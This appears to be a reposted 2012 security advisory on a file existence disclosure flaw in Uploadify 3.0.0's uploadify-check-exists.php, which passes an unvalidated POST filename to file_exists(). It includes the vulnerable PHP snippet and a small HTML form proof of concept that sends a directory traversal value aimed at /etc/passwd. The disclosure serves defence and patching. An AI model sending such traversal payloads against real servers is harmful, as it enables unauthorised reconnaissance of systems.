Uploadify 3.0.0 File Existence Disclosure

2012.04.06
Credit: waraxe
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

[waraxe-2012-SA#082] - File Existence Disclosure in Uploadify 3.0.0 =============================================================================== Author: Janek Vind "waraxe" Date: 05. April 2012 Location: Estonia, Tartu Web: http://www.waraxe.us/advisory-82.html Description of vulnerable software: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Uploadify is a jQuery plugin that integrates a fully-customizable multiple file upload utility on your website. It uses a mixture of Javascript, ActionScript, and any server-side language to dynamically create an instance over any DOM element on a page. http://www.uploadify.com/ Vulnerable versions ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Affected is Uploadify version 3.0.0. ############################################################################### 1. File Existence Disclosure vulnerability in "uploadify-check-exists.php" ############################################################################### Reason: missing input data validation Attack vector: user submitted POST parameter "filename" Preconditions: none Result: attacker can reveal existance of files and directories on remote system Source code snippet from script "uploadify-check-exists.php": -----------------[ source code start ]--------------------------------- if (file_exists($_SERVER['DOCUMENT_ROOT'] . '/uploads/' . $_POST['filename'])) { echo 1; } else { echo 0; } -----------------[ source code end ]----------------------------------- We can see, that user submitted POST parameter "filename" is used in argument for php function "file_exists()". There is no input data validation, therefore attacker can use directory traversal and reveal existence of arbitrary files and directories on affected system. Test: -----------------[ PoC code start ]----------------------------------- <html><body><center> <form action="http://localhost/uploadify-v3.0.0/uploadify-check-exists.php" method="post"> <input type="hidden" name="filename" value="../../../../../../../../etc/passwd"> <input type="submit" value="Test"> </form> </center></body></html> -----------------[ PoC code start ]----------------------------------- Result: 1 Contact: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ come2waraxe@yahoo.com Janek Vind "waraxe" Waraxe forum: http://www.waraxe.us/forums.html Personal homepage: http://www.janekvind.com/ Random project: http://albumnow.com/ ---------------------------------- [ EOF ] ------------------------------------

References:

http://www.waraxe.us/forums.html
http://www.janekvind.com/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top